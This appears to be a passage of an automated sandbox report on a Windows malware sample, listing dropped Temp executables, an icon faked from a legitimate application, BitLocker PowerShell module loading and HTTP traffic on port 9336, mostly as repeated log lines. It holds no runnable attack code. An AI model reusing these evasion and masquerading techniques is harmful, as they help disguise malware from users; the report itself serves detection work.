                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B372316 push 8B485F92h; iretd 10_2_00007FFD9B37231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B19D2A5 pushad ; iretd 13_2_00007FFD9B19D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B2B23CD pushad ; retf 13_2_00007FFD9B2B23F1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B2BC2C5 push ebx; iretd 13_2_00007FFD9B2BC2DA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B382316 push 8B485F91h; iretd 13_2_00007FFD9B38231B
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeJump to dropped file
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeFile created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Icon mismatch, binary includes an icon from a different legit application in order to fool users
                            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9336
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9336 -> 49738
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
